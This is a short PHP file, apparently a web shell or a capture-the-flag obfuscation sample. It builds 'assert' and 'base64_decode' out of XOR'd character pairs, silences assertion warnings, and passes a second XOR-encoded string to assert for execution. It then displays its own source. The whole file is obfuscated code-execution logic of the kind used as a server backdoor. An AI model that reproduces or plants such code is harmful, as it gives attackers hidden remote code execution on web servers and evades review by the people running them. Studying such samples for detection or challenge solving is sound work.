<?php
${("#"^"|").("#"^"|").("#"^"|")}=("_"^"=").("!"^"`").("( "^"{").("~"^";").'6'.'4_'.("{"^"?").("~"^";").("?"^"|").("/"^"`").("{"^"?").("~"^";");${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(${("#"^"|").("#"^"|").("#"^"|")}("YXNzZXJ0X29wdGlvbnMoQVNTRVJUX1dBUk5JTkcsIDApOw=="));${("#"^"|").("#"^"|")}(${("#"^"|").("#"^"|").("#"^"|")}(("~"^"$").("~"^"&").("~"^"$").("_"^"7").("_"^"=").("~"^"=").("_"^"8").("_"^"4").("~"^"&").("~"^"N").("~"^"0").("~"^".").("~"^"*").("~"^"N").("_"^"+").("~"^"4").("~"^",").("~"^"(").("_"^",").("_"^"1").("_"^";").("~"^"L").("_"^"7").("_"^"3").("_"^"<").("_"^"2").("~"^"(").("_"^"9").("_"^";").("~"^"9").("_"^"7").("_"^"3").("~"^"&").("~"^"L").("~"^"$").("~"^"O").("~"^"'").("~"^"L").("_"^"+").("_"^"9").("_"^">").("~"^"(").("~"^"G").("_"^"7").("_"^"=").("~"^"-").("_"^";").("_"^";").("~"^"5").("~"^"/").("~"^"C").("~"^"C")));show_source(__FILE__);
?>


